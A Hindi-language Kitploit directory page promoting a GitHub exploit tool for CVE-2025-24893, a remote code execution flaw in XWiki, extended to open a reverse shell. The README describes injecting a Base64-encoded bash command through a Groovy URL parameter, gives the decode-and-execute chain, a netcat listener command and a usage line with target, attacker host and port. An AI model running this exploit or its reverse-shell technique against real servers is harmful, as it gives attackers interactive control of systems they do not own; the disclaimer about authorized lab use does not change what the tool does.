Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubbishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

xwiki-15.10.8-reverse-shell-cve-2025-24893

CVE-2025-24893: XWiki के लिए रिवर्स शेल क्षमता वाला RCE एक्सप्लॉइट

रिपॉजिटरी देखें
491 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24893 XWiki के लिए रिवर्स शेल एक्सप्लॉइट

अस्वीकरण: यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। उन सिस्टम पर उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है। दुरुपयोग अवैध और खतरनाक हो सकता है।

विवरण

यह Python स्क्रिप्ट CVE-2025-24893 का शोषण करती है, जो 15.10.10 तक के XWiki संस्करणों को प्रभावित करने वाली एक रिमोट कोड निष्पादन (RCE) कमजोरी है।

  • परीक्षित संस्करण: XWiki 15.10.8
  • प्रभाव: लक्ष्य सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देता है।
  • Python संस्करण: Python 3 में लिखी और परीक्षित की गई है।

यह संस्करण Al Baradi Joy द्वारा मूल PoC को विस्तारित करता है ताकि एक रिवर्स शेल उत्पन्न किया जा सके। मूल PoC यहां पाया जा सकता है।

यह कैसे काम करता है

  • XWiki URL पैरामीटर के माध्यम से Groovy कोड निष्पादित करता है।

  • एक्सप्लॉइट इस Groovy टेम्पलेट में एक bash -c कमांड इंजेक्ट करता है।

  • एक सामान्य रिवर्स शेल में कई उद्धरण (' और ") होते हैं जो Groovy मूल्यांकन और URL को तोड़ देंगे।

  • इसे हल करने के लिए, स्क्रिप्ट एक-पंक्ति शेल कमांड को Base64 में एन्कोड करती है।

  • फिर पेलोड URL में भेजा जाता है और निम्न श्रृंखला का उपयोग करके निष्पादित किया जाता है:

    {echo,<base64>} | {base64,-d} | {bash,-i}

  • यह Base64 पेलोड को सुरक्षित रूप से डीकोड करता है और bash -i के साथ निष्पादित करता है, जो एक इंटरैक्टिव रिवर्स शेल देता है।

लक्ष्य URL प्रारूप

  • प्रारूप: http://<लक्ष्य-होस्ट>
  • शामिल न करें:
    • अंत में एक अनुगामी स्लैश /
    • /xwiki पथ (स्क्रिप्ट इसे स्वचालित रूप से जोड़ती है)

उदाहरण:

# Correct
http://10.129.95.114:8080
http://example.com:8080

# Incorrect
http://10.129.95.114:8080/         # trailing slash
http://example.com/xwiki            # includes /xwiki

लिसनर सेटअप

एक्सप्लॉइट चलाने से पहले, आपको रिवर्स शेल को पकड़ने के लिए अपनी मशीन पर एक लिसनर शुरू करना होगा।

Netcat का उपयोग करते हुए उदाहरण:

nc -lvnp <lport>
  • <lport> को उस पोर्ट से मेल खाना चाहिए जो आप स्क्रिप्ट को तर्क के रूप में प्रदान करते हैं।

उपयोग

python3 cve-2025-24893.py <target_base_url> <lhost> <lport>

उदाहरण:

python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
  • स्क्रिप्ट पूर्ण एक्सप्लॉइट URL, Base64 पेलोड और आपके लिसनर की जांच करने के निर्देश प्रिंट करती है।

संदर्भ

  • GHSA सलाह
  • XWiki होमपेज
  • मूल PoC Al Baradi Joy द्वारा

क्रेडिट

  • मूल प्रूफ-ऑफ-कॉन्सेप्ट: Al Baradi Joy
  • यह संस्करण: इंटरैक्टिव कमांड निष्पादन के लिए रिवर्स शेल उत्पन्न करने के लिए उन्नत किया गया

चेतावनी

  • इस एक्सप्लॉइट का उपयोग केवल नियंत्रित वातावरण (HTB, लैब मशीनें, आपके स्वामित्व वाले VM) में करें।
  • सार्वजनिक सर्वरों पर अनधिकृत उपयोग अवैध है और इसके परिणामस्वरूप आपराधिक आरोप लग सकते हैं।
टूल डाउनलोड करें